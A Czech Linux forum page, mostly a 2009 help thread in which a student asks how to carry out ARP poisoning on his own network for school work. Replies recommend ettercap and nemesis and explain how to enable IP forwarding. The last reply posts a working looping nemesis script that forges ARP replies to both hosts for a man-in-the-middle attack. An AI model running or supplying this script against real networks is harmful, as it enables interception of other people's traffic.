Přihlášení | Registrace

napište » Zprávičky

včera 17:33 | Nová verze

Canonical vydal (email, blog, YouTube) Ubuntu 24.04 LTS Noble Numbat. Přehled novinek v poznámkách k vydání a také příspěvcích na blogu: novinky v desktopu a novinky v bezpečnosti. Vydány byly také oficiální deriváty Edubuntu, Kubuntu, Lubuntu, Ubuntu Budgie, Ubuntu Cinnamon, Ubuntu Kylin, Ubuntu MATE, Ubuntu Studio, Ubuntu Unity a Xubuntu. Jedná se o 10. LTS verzi.

Ladislav Hagara | Komentářů: 4

Videozáznam z Czech Open Source Policy Forum 2024

včera 14:22 | Komunita

Na YouTube je k dispozici videozáznam z včerejšího Czech Open Source Policy Forum 2024.

Ladislav Hagara | Komentářů: 1

Fossil 2.24

včera 13:22 | Nová verze

Fossil (Wikipedie) byl vydán ve verzi 2.24. Jedná se o distribuovaný systém správy verzí propojený se správou chyb, wiki stránek a blogů s integrovaným webovým rozhraním. Vše běží z jednoho jediného spustitelného souboru a uloženo je v SQLite databázi.

Ladislav Hagara | Komentářů: 0

Vivaldi 6.7

včera 12:44 | Nová verze

Byla vydána nová stabilní verze 6.7 webového prohlížeče Vivaldi (Wikipedie). Postavena je na Chromiu 124. Přehled novinek i s náhledy v příspěvku na blogu. Vypíchnout lze Spořič paměti (Memory Saver) automaticky hibernující karty, které nebyly nějakou dobu používány nebo vylepšené Odběry (Feed Reader).

Ladislav Hagara | Komentářů: 0

Node.js 22

včera 04:55 | Nová verze

OpenJS Foundation, oficiální projekt konsorcia Linux Foundation, oznámila vydání verze 22 otevřeného multiplatformního prostředí pro vývoj a běh síťových aplikací napsaných v JavaScriptu Node.js (Wikipedie). V říjnu se verze 22 stane novou aktivní LTS verzí. Podpora je plánována do dubna 2027.

Ladislav Hagara | Komentářů: 0

Proxmox Virtual Environment 8.2

včera 04:22 | Nová verze

Byla vydána verze 8.2 open source virtualizační platformy Proxmox VE (Proxmox Virtual Environment, Wikipedie) založené na Debianu. Přehled novinek v poznámkách k vydání a v informačním videu. Zdůrazněn je průvodce migrací hostů z VMware ESXi do Proxmoxu.

Ladislav Hagara | Komentářů: 0

R 4.4.0 (Puppy Cup)

včera 04:11 | Nová verze

R (Wikipedie), programovací jazyk a prostředí určené pro statistickou analýzu dat a jejich grafické zobrazení, bylo vydáno ve verzi 4.4.0. Její kódové jméno je Puppy Cup.

Ladislav Hagara | Komentářů: 0

IBM kupuje společnost HashiCorp za 6,4 miliardy dolarů

24.4. 22:44 | IT novinky

IBM kupuje společnost HashiCorp (Terraform, Packer, Vault, Boundary, Consul, Nomad, Waypoint, Vagrant, …) za 6,4 miliardy dolarů, tj. 35 dolarů za akcii.

Ladislav Hagara | Komentářů: 12

TrueNAS SCALE 24.04 “Dragonfish”

24.4. 15:55 | Nová verze

Byl vydán TrueNAS SCALE 24.04 “Dragonfish”. Přehled novinek této open source storage platformy postavené na Debianu v poznámkách k vydání.

Ladislav Hagara | Komentářů: 0

Raspberry Pi Compute Module 4S s 2 GB, 4 GB a 8 GB paměti

24.4. 13:44 | IT novinky

Oznámeny byly nové Raspberry Pi Compute Module 4S. Vedle původní 1 GB varianty jsou nově k dispozici také varianty s 2 GB, 4 GB a 8 GB paměti. Compute Modules 4S mají na rozdíl od Compute Module 4 tvar a velikost Compute Module 3+ a předchozích. Lze tak provést snadný upgrade.

Ladislav Hagara | Komentářů: 0

Centrum | Napsat | Starší

navrhněte » Anketa

KDE Plasma 6

už používám (73%)

čekám, až se dostane do mé distibuce (9%)

čekám na pozdější vydání v řadě (2%)

preferuji jiné desktopové prostředí (16%)

Celkem 765 hlasů

Komentářů: 4, poslední 6.4. 15:51

Rozcestník

AbcLinuxu

HDmag.cz

AbcLinuxu:/ Poradna / Linuxová poradna / Arp poisoning

Štítky: není přiřazen žádný štítek

Dotaz: Arp poisoning

29.10.2009 14:57 Marek Adamovsky
Arp poisoning

Přečteno: 751×

Odpovědět | Admin

Dobry den, rad bych na sve siti provedl ARP poisoning, abych mohl tento utok analyzovat a popsat jako praci do skoly. Muzete mi prosim poradit jakou aplikaci na ARP poisoning pouzit?

Nástroje: Začni sledovat (2) ?

Odpovědi

29.10.2009 15:21 Cubic | skóre: 24 | blog: obcasne_vyplody | Essex
Rozbalit Rozbalit vše Re: Arp poisoning

google nic? zacit muzes s ettercap

Do you like what you see? No? Well, bloody look harder.

29.10.2009 16:49 Marek Adamovsky
Rozbalit Rozbalit vše Re: Arp poisoning

Dekuji, prave to zkousim. Podle tohoto navodu: http://openmaniak.com/ettercap_arp.php Data zachytavam Wiresharkem, jenze mi to funguje tak na pul. "Otraveny" host posle pozadavek (treba na nacteni stranky) na router, ja ho ale u sebe nevidim. Vidim pouze odpoved, ktera prijde.

Je to jako kdyby host nebyl otraveny a posilal data spravne na router a router byl otraveny a posilal data ke mne. Je neco takoveho mozne? V cem muze byt chyba?

A jeste bych se chtel zeptat, jestli je toto ok:

$ cat /proc/sys/net/ipv4/ip_forward
0

29.10.2009 17:22 Cubic | skóre: 24 | blog: obcasne_vyplody | Essex
Rozbalit Rozbalit vše Re: Arp poisoning

nevim, jen jsem si vzpomnel ze to je v ettercapu mozne ale predpokladam ze

echo 1 > /proc/sys/net/ipv4/ip_forward
potreba bude

Do you like what you see? No? Well, bloody look harder.

29.10.2009 17:33 Marek Adamovsky
Rozbalit Rozbalit vše Re: Arp poisoning

A nevite proc nejde toto:

$ sudo echo 1 > /proc/sys/net/ipv4/ip_forward
bash: /proc/sys/net/ipv4/ip_forward: Permission denied

Pokud se ale prepnu na roota pres su tak to jde, ale ja bych to rad umistil do skriptu.

29.10.2009 17:51 Bilbo | skóre: 29
Rozbalit Rozbalit vše Re: Arp poisoning

Protoze to provede prikaz "echo 1" pod rootem a jeho vystup (uz pod normalnim uzivatelem) presmeruje do /proc/sys/net/ipv4/ip_forward

Musi se to ouvozovkovat:

sudo 'echo 1 > /proc/sys/net/ipv4/ip_forward'

pak se to spusti spravne cele jako prikaz pod rootem

Big brother is not watching you anymore. Big Brother is telling you how to live...

8.11.2009 09:32 Marek Adamovsky
Rozbalit Rozbalit vše Re: Arp poisoning

Stale nic:

$ sudo 'echo 1 > /proc/sys/net/ipv4/ip_forward'
sudo: echo 1 > /proc/sys/net/ipv4/ip_forward: command not found

8.11.2009 11:30 l4m4
Rozbalit Rozbalit vše Re: Arp poisoning

sudo takhle nefunguje (tj. nenechává napsané interpretovat shellem), protože by to citelně zkomplikovalo omezení, když má uživatel povoleno spouštět jen určité věci. sudo prostě napsané exec-ne.

a) spouštěj to v rootovském shellu

b) dej to do skriptu, ten pak můžeš spouštět přes sudo

8.11.2009 15:20 Bilbo | skóre: 29
Rozbalit Rozbalit vše Re: Arp poisoning

No, pokud je sudo "neomezene" (osobne sudo nepouzivam, jen su, takze ho moc neznam, ale tusim nejak takhle je nastaveno treba ve vychozi konfiguraci Ubuntu), tak i s tim shellem by to slo, asi by se muselo pouzit neco jako:

sudo sh -c 'echo 1 > /proc/sys/net/ipv4/ip_forward'

nebo

sudo "sh -c 'echo 1 > /proc/sys/net/ipv4/ip_forward'"

Nebo ten skript :)

Big brother is not watching you anymore. Big Brother is telling you how to live...

29.10.2009 16:17 NN
Rozbalit Rozbalit vše Re: Arp poisoning

nemesis (odzkouseno :D )

29.10.2009 19:40 faha
Rozbalit Rozbalit vše Re: Arp poisoning

Zdravim, je to vcelku "trivialni" utok a take je pomerne dobre popsany, hezky je to popsane v knize Linux hackerské útoky.

Jeden z pouzivanych nastroju je nemesis, najdete ho alespon v debianu primo v repositari.

nemesis - TCP/IP Packet Injection Suite

Jeste prikladam skriptik jak to udelat...

----

#!/bin/sh

SOURCEMAC=""
SOURCEIP=""

DESTMAC=""
DESTIP=""

MYMAC=""
MYIP=""

while true
do
# 1
/usr/bin/nemesis arp -v -r -d eth0 -S $DESTIP -D $SOURCEIP -h $MYMAC -m $SOURCEMAC -H $MYMAC -M $SOURCEMAC

# 2
/usr/bin/nemesis arp -v -r -d eth0 -S $SOURCEIP -D $DESTIP -h $MYMAC -m $DESTMAC -H $MYMAC -M $DESTMAC
echo "Injecting ... "
sleep 10
done
----